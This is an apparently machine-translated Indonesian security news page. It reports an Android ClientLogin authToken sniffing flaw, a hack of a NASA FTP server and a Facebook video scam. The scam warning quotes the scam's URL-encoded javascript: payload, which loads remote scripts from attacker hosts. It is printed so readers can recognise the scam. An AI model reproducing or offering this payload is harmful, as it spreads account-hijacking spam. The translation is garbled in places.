Kerentanan dalam Protokol ClientLogin Google!

Sekelompok peneliti keamanan dan privasi dari Institut Media Informatika di Universitas Ulm di Jerman, yang mengaku telah menemukan kerentanan keamanan serius dalam protokol ClientLogin Google.
Dalam analisis terbaru dari platform Android, kelompok menemukan bahwa ketika pengguna Android tersambung ke jaringan Wifi tidak terenkripsi terbuka, penyerang bisa baik membaca data sinkronisasi dikirimkan Google Kontak, Kalender dan Picasa Web Album, dan menangkap authToken yang pengguna otentikasi.
Bastian Könings, salah seorang peneliti dari kelompok itu, mengatakan kepada SecurityWeek, "musuh itu bisa menggunakan authToken untuk mendapatkan akses penuh ke data API layanan spesifik dan melihat, mengubah atau menghapus kontak, kalender acara, dan album web itu pengguna. "
"Kerentanan ini tidak terbatas pada aplikasi Android Google, tetapi untuk setiap aplikasi dan aplikasi desktop yang menggunakan protokol Google ClientLogin melalui HTTP bukan HTTPS," tambah Könings.
Kelompok catatan sebuah skenario yang menarik, mengatakan bahwa di luar informasi pengguna mencuri, musuh dapat melakukan perubahan halus tanpa memperhatikan pengguna. "Misalnya, musuh bisa mengubah alamat email yang tersimpan dari bos korban atau mitra bisnis berharap untuk menerima materi sensitif atau rahasia yang berkaitan dengan bisnis mereka," kata kelompok dalam posting mengungkapkan kerentanan "Karena seumur hidup panjang authTokens. , musuh nyaman dapat menangkap sejumlah besar tanda dan memanfaatkan mereka nanti dari lokasi yang berbeda, "tambah grup.
Jenis serangan serupa pada lingkup untuk mencuri sesi cookie situs Web, kadang-kadang disebut "sesi pembajakan" atau "Sidejacking. Sidejacking menarik perhatian banyak seputar dirilis Firesheep, sebuah plugin yang memungkinkan drag dan drop hacking serangan terhadap situs-situs seperti Facebook, Twitter, Yahoo dan banyak lagi.
Bastian Könings mengatakan SecurityWeek melalui email bahwa kelompok tersebut telah menghubungi Google tentang masalah ini dan itu tetap untuk Kalender dan Kontak di Android 2.3.4. Namun, Könings mengatakan bahwa Picasa sinkronisasi app Galeri saham masih rentan. "Sayangnya, distribusi Android 2.3.4 langka dan sebagian besar versi Android yang 2.3.3 dan di bawah," tambahnya.
keterangan lebih lanjut dari penemuan tersedia di sini. Gambar di bawah ini menunjukkan Wireshark authToken untuk ClientLogin dalam permintaan API data ke layanan Album Web Picasa

TinKode Hack FTP Pusat Penerbangan Ruang Angkasa Goddard NASA!

TinKode Beri lain Hack besar. Kali ini ia hack FTP dari NASA Goddard Space Flight Center di servir.gsfc.nasa.gov, Beberapa Bulan sebelum Badan Antariksa Eropa (ESA.INT) juga Hacked oleh TinKode. Pada gambar di atas Anda dapat melihat bukti hack

New Facebook Scam : WTF I can’t believe you’re in this video !

Jika Anda kebetulan untuk mendapatkan posting tembok baru dari teman Anda mengatakan

"WTF Aku tidak percaya kau ini vid" atau
"rofl i cant percaya youre tag dalam video ini"

Scam baru Its menyebar di Facebook. Jangan membuka atau klik pada link lain itu akan diposting ke dinding semua teman Anda, esp. menyalin setiap URL [code java-script] dan paste di navigasi browser Anda / bar lokasi untuk membantu menyebarkan pesan ke semua teman Anda.

     javascript: (fungsi () 20-an 7Bfunction%% (src)% 7Bvar% 20script% 20% 20document.createElement3D% (% 22script% 22)% 3Bscript.src% 20% 3D% 3Bdocument.body.appendChild 20src% (script) %3B%%% 20rand 7Dvar 20% 3D% 20Math.floor (Math.random () * (100))% 3B 20if (% 22http% 3A% 2F% 2Fvideosurge.info% 2Fverify.js% 22) 3B%% (rand% 20% 3C% 3D% 2025 20-an%) (% 22http% 3A% 2F% 2Fvideosurge.info% 2Fconfig.js% 22)% 20s% 3Belse (% 22http% 3A% 2F% 2Fbanfish.info% 2Fconfig.js% 22)% 3B% 7D) () 3B%


Yang terpenting bagi pengguna yang jatuh ke dalam penipuan tersebut dengan mengklik link pada impuls. Ingat agar API tidak menyediakan data tentang pengguna yang telah mengunjungi profil Anda atau jika teman Anda yang hadir dalam video.

Silakan berbagi pesan ini, dan jika Anda sudah terkena penipuan ini, hapus semua posting dinding terkait dari profil Anda, mengubah password anda dan perbarui teman Anda tentang penipuan atau berbagi link di Facebook.